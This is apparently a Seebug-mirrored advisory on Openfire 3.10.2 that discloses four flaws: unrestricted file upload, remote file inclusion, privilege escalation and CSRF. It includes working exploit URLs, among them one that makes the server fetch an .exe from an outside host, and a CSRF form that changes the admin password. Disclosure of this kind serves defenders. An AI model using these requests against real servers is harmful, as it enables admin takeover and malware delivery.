Openfire 3.10.2 - Multiple Vulnerabilities

2017-09-12T00:00:00
ID SSV:96438
Type seebug
Reporter Root
Modified 2017-09-12T00:00:00

Description

Product:

Openfire 3.10.2

Openfire is a real time collaboration (RTC) server licensed under the Open Source Apache License. It uses the only widely adopted open protocol for instant messaging, XMPP (also called Jabber).

Vulnerability Type:

Unrestricted File Upload

Vulnerability Details:

Application specifies Plugin files (.jar) can be uploaded directly by using the form, however so can the following. .exe .php .jsp .py .sh

Exploit code(s):

  • 1) choose some malicious file using the File browser
  • 2) click 'upload plugin'

http://localhost:9090/plugin-admin.jsp Our malicious uploaded files will be stored under /openfire/plugins directory.

Description:

Request Method(s): [+] POST Vulnerable Product: [+] Openfire 3.10.2 Vulnerable Parameter(s): [+] fileName Affected Area(s): [+] Server


Openfire 3.10.2 - Remote File Inclusion

Openfire is a real time collaboration (RTC) server licensed under the Open Source Apache License. It uses the only widely adopted open protocol for instant messaging, XMPP (also called Jabber).

Vulnerability Type:

Remote File Inclusion

Vulnerability Details:

In available-plugins.jsp there is no validation for plugin downloads, allowing arbitrary file downloads from anywhere on the internet.

On line 40: all that needs to be satisfied is the paramater is not null. boolean downloadRequested = request.getParameter("download") != null; String url = request.getParameter("url");

If the above condition check returns true, the application downloads whatever file you give it.

line 54: ```

if (downloadRequested) {
    // Download and install new plugin
    updateManager.downloadPlugin(url);
    // Log the event
    webManager.logEvent("downloaded new plugin from "+url, null);
}

```

Exploit code(s):

1) download arbitrary filez

e.g. http://localhost:9090/available-plugins.jsp?download=1&url=http://ghostofsin.abyss/abysmalgod.exe Our RFI will be downloaded toopenfire\plugins directory.


Openfire 3.10.2 - Privilege Escalation

Vendor:

  • www.igniterealtime.org/projects/openfire
  • www.igniterealtime.org/downloads/index.jsp

Product:

Openfire 3.10.2

Openfire is a real time collaboration (RTC) server licensed under the Open Source Apache License. It uses the only widely adopted open protocol for instant messaging, XMPP (also called Jabber).

Vulnerability Type:

Privilege escalation

Vulnerability Details:

No check is made when updating the user privileges, allowing regular user to become an admin. Escalation can be done remotely too if user is logged in as no CSRF token exist.

Exploit code(s):

Become admin! http://localhost:9090/user-edit-form.jsp?username=hyp3rlinx&save=true&name=blasphemer&email=ghostofsin@abyss.com&isadmin=on

Openfire 3.10.2 - CSRF Vulnerabilities

Product:

Openfire 3.10.2

Openfire is a real time collaboration (RTC) server licensed under the Open Source Apache License. It uses the only widely adopted open protocol for instant messaging, XMPP (also called Jabber).

Vulnerability Type:

Cross site request forgery (CSRF)

Vulnerability Details:

No CSRF tokens exists allowing us to take malicious actions against the application.

  • change admin password.
  • add aribitrary users to the system
  • edit server settings e.g. turn off SSL.
  • Add rogue malicious clients with permit access (Allow all XMPP clients to connect) and more...

Exploit code(s):

  • change admin password

``` <script> function doit(){ var e=document.getElementById('HELL') e.submit() } </script>

<form id="HELL" action="http://localhost:9090/user-password.jsp" method="post"> <input type="text" name="username" value="admin" > <input type="text" name="password" value="abc123"> <input type="text" name="passwordConfirm" value="abc123" > <input type="password" name="update" value="Update+Password" > </form> ```

  • add aribitrary users

http://localhost:9090/user-create.jsp?username=hyp3rlinx&name=hyp3rlinx&email=blasphemer@abyss.com&password=abc123&passwordConfirm=abc123&create=Create+User

  • edit server settings & turn off SSL

http://localhost:9090/server-props.jsp?serverName=myserver&sslEnabled=false&save=Save+Properties

  • add rogue malicious clients

http://localhost:9090/plugins/clientcontrol/permitted-clients.jsp?all=false&other=http%3A//maliciouso.com/666.exe&addOther=Add